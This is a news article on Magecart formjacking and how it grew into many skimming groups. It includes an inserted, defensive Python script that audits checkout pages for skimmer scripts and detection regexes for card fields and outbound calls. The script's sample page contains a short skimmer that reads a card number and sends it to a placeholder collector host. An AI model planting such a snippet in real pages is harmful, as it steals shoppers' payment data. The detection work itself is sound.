Magecart can no longer be considered the work of a single cybercrime group, but rather, an e-commerce security threat category in its own right
When Magecart first appeared on the scene with the breach of payment websites belonging to household names including British Airways, Ticketmaster, Sotheby’s, Newegg, and Cathay Pacific, many believed it was the work of a single group with a predilection for credit card skimmers.
In a technique known as ‘formjacking’, Magecart attackers exploit vulnerabilities in websites built on e-commerce backend systems such as Magento to inject malicious code into checkout pages, where it skims and steals payment card data.
This information is then whisked away to a command and control (C2) server, where it may be moved on and sold in underground markets or used to conduct fraudulent transactions online.
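A defender-side way to spot the injection pattern described above, added here as an illustration and not code from the original article or the reports it cites: it audits a checkout page's HTML for scripts served from hosts outside an assumed first-party allowlist, cross-origin scripts without Subresource Integrity, and inline scripts that both read card fields and call an outbound-request API. The allowlist, hostnames and sample page are constructed placeholders.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed first-party hosts allowed to serve checkout scripts (placeholders).
ALLOWED_SCRIPT_HOSTS = {"shop.example", "cdn.shop.example"}
PAYMENT_FIELDS = re.compile(r"card[_-]?number|cvv|cvc|expir", re.I)
OUTBOUND_APIS = re.compile(r"fetch\(|XMLHttpRequest|sendBeacon|new Image\(", re.I)

class ScriptCollector(HTMLParser):
    """Collect every <script> tag as {src, integrity, body}."""
    def __init__(self):
        super().__init__()
        self.scripts, self._cur = [], None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            a = dict(attrs)
            self._cur = {"src": a.get("src"), "integrity": a.get("integrity"), "body": ""}

    def handle_data(self, data):
        if self._cur is not None:
            self._cur["body"] += data

    def handle_endtag(self, tag):
        if tag == "script" and self._cur is not None:
            self.scripts.append(self._cur)
            self._cur = None

def audit_checkout_html(html, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Return (finding, detail) pairs for scripts that do not belong on a checkout page."""
    p = ScriptCollector()
    p.feed(html)
    p.close()
    findings = []
    for s in p.scripts:
        if s["src"]:
            host = urlparse(s["src"]).hostname or ""  # relative src -> first-party
            if host and host not in allowed_hosts:
                findings.append(("unexpected-script-host", host))
            elif host and not s["integrity"]:
                findings.append(("missing-sri", s["src"]))
        elif PAYMENT_FIELDS.search(s["body"]) and OUTBOUND_APIS.search(s["body"]):
            findings.append(("inline-skimmer-pattern", s["body"].strip()[:60]))
    return findings

# Constructed sample checkout page; all hostnames are placeholders, not real sites.
SAMPLE_HTML = """<script src="https://cdn.shop.example/checkout.js"></script>
<script src="https://static.unknown-host.example/lib.js"></script>
<script>var n = document.getElementById('cardNumber').value;
navigator.sendBeacon('https://collector.example/x', n);</script>"""
```

Run against a real page, the same three finding types map to the controls a site can enforce: a script-src allowlist, SRI on cross-origin scripts, and review of any inline script on the payment page.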
Symantec says that more than 4,800 websites are compromised through formjacking every month. One-third of all detections occur during the holiday shopping season.
With high-profile enterprise companies becoming lucrative sources for stolen data, cybercriminals want to cash in – and the Magecart technique is proving popular.
According to a new report released today (August 28) by Aite Group and Arxan, Magecart should now be considered an umbrella term, under which many different groups are operating.
RiskIQ and Flashpoint said in November that at least seven groups were in operation, which later rose to nine. It is now believed that at least 10 Magecart entities are involved in financial data theft.
“Magecart has gone from relative obscurity to dominating national headlines and ascending to the top of the e-commerce industry’s most-wanted list,” Aite says.
“While it originated back in 2015 as the name of a group installing skimmers on e-commerce sites, it’s now being used for anonymity by multiple groups that use the same tactics but different techniques.”
Infected servers were sending skimmed card details to cyberattackers and, in some cases, more than one group had managed to compromise the same website.
The increase in formjacking has resulted in some Magecart groups evolving their tactics beyond basic, vulnerability-based infection.
Magecart credit card skimmers have also recently been found in Amazon S3 buckets, leading to the compromise of thousands of websites through so-called ‘spray and pray’ tactics. In a recent case documented by Malwarebytes, the website of the Poker Tracker software suite was running a vulnerable, outdated version of Drupal that was targeted by Magecart.
This may indicate that attackers using the Magecart technique are expanding beyond Magento to include other e-commerce systems.
Speaking to The Daily Swig, Jérôme Segura, director of threat intelligence at Malwarebytes, said that we should expect Magecart to encompass more techniques to both attack and avoid detection in the future.
“We should remember that web skimmers have existed for a long time and that the client-side artifacts we see these days could be replaced by server-side operations,” Segura says.